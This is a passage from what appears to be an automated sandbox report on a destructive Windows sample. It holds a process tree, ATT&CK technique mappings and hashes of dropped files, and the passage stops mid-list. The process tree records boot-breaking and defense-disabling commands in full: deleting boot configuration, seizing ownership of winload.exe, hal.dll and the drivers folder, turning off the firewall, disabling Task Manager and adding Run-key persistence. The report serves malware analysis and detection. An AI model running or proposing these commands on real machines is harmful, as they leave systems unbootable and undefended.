        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:10856
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:11164
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10432
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10752
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9736
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8180
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6744
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8772
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5956
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11180
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:2624
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11164
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10252
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B0E7.tmp\B0E8.tmp\B0E9.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8428
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:704
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10340
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:3720
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10324
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B200.tmp\B201.tmp\B202.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:6916
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:8876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Modifies file permissions
        
        PID:5940
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        
        PID:10980
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:1748
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:10392
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:3028
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:2516
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:2656
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7316
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B329.tmp\B33A.tmp\B33B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:3396
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10304
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7680
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9920
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10264
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6952
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2564
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9032
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10920
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6452
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6680
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6688
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6696
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6704
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7004
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5714.tmp\5715.tmp\5716.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:1448
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:8308
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:8056
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:3916
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8592
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8828
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:8596
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5436
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:9300
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:9708
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:9280
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:9804
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:8652
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:1912
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7064
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:10940
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:11244
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6924
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7092
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6404
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1968
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7232
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7580
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E84.tmp\6E85.tmp\6E86.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:6976
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:5148
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6968
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:1988
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4300
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8788
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:9196
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6312
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8920
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:5904
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7788
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:9492
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:10152
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6572
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:2344
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:10788
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:11060
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9076
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11104
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8280
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8400
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7216
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5192
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7708
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7872
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7892
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7900
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7416
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4552
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7500
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7924
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6168
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:620
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3668
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8232
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8620
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:8920
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:7992
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1264
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1128
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:5108
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:2168
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2452
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4824
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3316
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4480
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2480
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1460
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1912
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:2324
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:4724
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:4076
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:1196
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:5480
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:4960

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4c0 0x4a8
1⤵
PID:3576

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4716

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1108

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2496

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5452

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5656

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6956

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7240

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7340

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8112

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6728

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7196

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8508

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8232

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7196

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5300

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9600

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9284

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6544

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6572

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4328

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11036

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6088

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Filesize
112KB

MD5
81a7a946456f1f6dae4715b1feb72ed0

SHA1
af83b938017efd53f95671adc0c6d2aa1088d38e

SHA256
690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

SHA512
a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\A335.tmp\A336.tmp\A337.bat

Filesize
23KB

MD5
afb3843724a58bbbb53fd12a8f42d8e6

SHA1
0835bbceeb20027752c05e48b1b7c4571611f32f

SHA256
53f749148a1e78cf315f16934350a13113705b95d2a375573c7007dfeaba047d

SHA512
8c8ba2b13e6fc63ddb7205ef223a2cf954fdcc8737ee031533d916535df401581dad3c3bd53416340e12569d9ad505051a63edc4f77905dbd96f94eadef84fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
2d5e64f315b8d72e7ff178042cb131baf0d982e74c09455911358ab3552e6e5919ac5f567b1cf31f91ad5613f2b91c5eff5e251e014c230490e4a323da7a7946

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
30B

MD5
c1d1d009fa868b67fe8ae820ae3a7564

SHA1
5908963134b1dc6b00cd335f42e7721f668f832a

SHA256
721dad6e2ab061b3d306bf39656fc32e82b007b43a7ea5367b69b2a62e51af49

SHA512
671f69f2f037920c78269ad9322f517b10e169d62d8b16aff899e55c66a0560cc5df389e5b2ee1139bef4cfe86263ceadbb705fc7f8a4296430a2a5b46d1eaab

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
60B

MD5
a12f4d34a99c14c98463e9779ae4c008

SHA1
9677e26fc0711879b5c7f12eadfa6727e4cc63c7

SHA256
9da85b8516711c1e92ab0206908d95699bac1280b1cadb3cef8a554624e95f2b

SHA512
fdc46135ef84c5c3ede54cd09208546052699ed54c1c39c6d409d7a3441a902bb9871452af1f82ce1600c223b2720c25bb6d9194ac80b15ff2955288a0c0a1da

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
90B

MD5
acba0fe3a48e7297440c136aaf975e44

SHA1
3eafa0722acbafa8cb61eaf1a93d51563c5ec987

SHA256
549bc4d8027b5b82b9b73e89f7c1549d4690c9bea4c13dfaa210a737718b73da

SHA512
cc216231aa16c41b963e1b732f2a5e49ced2efd409137e5c6fd54f4fb52092e951825aba4b5a0b9486c0695336e7b451c849a1422a8741c94ac9aaa1e2cdc4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
120B

MD5
9512cf977fd3cfacad693e88bc62cc7e

SHA1
006b8a3d5c348e3c2963da33e5b8483c2d9badd1

SHA256
b7f4d2db7506132f6b164931675e8bdc63abdecdc035385ede0e667b5b60945e

SHA512
83ebe1086aa48f9a8a3222f43e5bf3021c1841852d0876f76557b22397d9ece8370fd5cef6717dae2031196246eafe0eb622af65ee1bf1ca7adb4974f5750896

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
71B

MD5
c50b8418d9f7ec5980f0bcd9bca4a735

SHA1
d00d3064b043e6cb78476d7820998d9b89f9fdc7

SHA256
48ee941955387e29c12380d852a363bdf22ef49897c0bd814aaeacba6bc852aa

SHA512
0b71f8c7bb3d9be0017dd30cb25500df4a04d77234c9ed36222fda37af1a2b66dc8fccd2fe8c27f164bef7b892e9a6b1745469623cb71f3c3a1700509165f6f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
14KB

MD5
1bad8558f3516ac2a33bda18398ae7bd

SHA1
ca6e3cdc52e209f639a4e260dd21602baeb4f009

SHA256
f00f4cfb8ff634c4eba20ba674b1906f82c35f7dfc933009ae30203749cef8ee

SHA512
e3b245dfe1b550e2a7ee96952f67039d45dd0d4db1e09ecb4e66516d68a8e4b69e7b607481fa49d0b92557007eee4dbe46276325c3304775202f3db16617a3ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
1KB

MD5
caf0bd8e3f63955d61a088f2a973101c

SHA1
709ebf2e957ddf5750cedbd598c3bea12ae23a87

SHA256
d5b49c1547ffc2884a1a6483e9361aa2b38ac675700aeead8d65cf6f97b23e91

SHA512
f1459f71233e0800ef0fcd72782dbb1154c7d3fcb9dcfffa03c930ce2bb7fb1f1d04798c561f9efec81d35f8e25380293200e4c5ffeba2e083dcea0e6492a390

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
4KB

MD5
0bbcebceeb481ed6e31abff46f03bb96

SHA1
23bed486ff1f7576657a8216d13665e7ae007d3c

SHA256
ef13d69d5baccbed64b64ebebd7a3009fd00e7ec4c1c5b10e8ada737da1acbeb

SHA512
25fdc2e64c36985a232a2d64ccfb219397d14ed5fc9b1b5992442f0937e151badd6700e4aaf0df8978576e2a16aefdee9f84fb8447e4083d185b5a37eaafd61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
4KB

MD5
388b6d606169f6654804c1c2cfa99ae8

SHA1
6a4c50533ea6a56253dc4a2bc2c515f85905da89

SHA256
df97f22cb40158a831c55ac33a78721e6b49b7084697f3c970bf9fe1a9fb9bfa

SHA512
fc95f68c698ce3d71c7ed2197f4d8438f56e35378a9ab129158460739836027a9100775a1ecac69c461599b61349cdf363fb06a5ddfd88fe75c6386b698b4378

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
376B

MD5
dc546ca43cfa1579cb06da2ac11f76fb

SHA1
63677f352aaa14b119e568fece61ab7a5a483e4b

SHA256
ad2155b88673e56fe72786375727d97f7d4a3fbbc492cf297aa13392edccc835

SHA512
121404a88d48594952f8dbf9154c8f39e8b3e6733f5e6fa605d59b7f35d740365873288fec74f48a3f962981285d860046e864ae71d2e4a3cf7c34efdd3872ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
188B

MD5
a5fa08e54b3818a7ee1d88ea2662d0ee

SHA1
bca38f9f1f103beb93b6ba7451b848edba0be8ee

SHA256
ca105f2e9b178394fe18c299ccb1234d42caa587f090f73ee12bee04fdb04f7b

SHA512
80583a90d237c08514d9113ed1115a0d6e36ca7f754b1a9aaf5b560f78a7885831b5258d0f25705e2701cb15d64d7f99beb7f731ec7d61d4b648fe0ffbb1f782

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
521B

MD5
c7bfad6063a60575b8f7b165964150ee

SHA1
0f538ac7db78ea92b69549cc507769d7bff39e04

SHA256
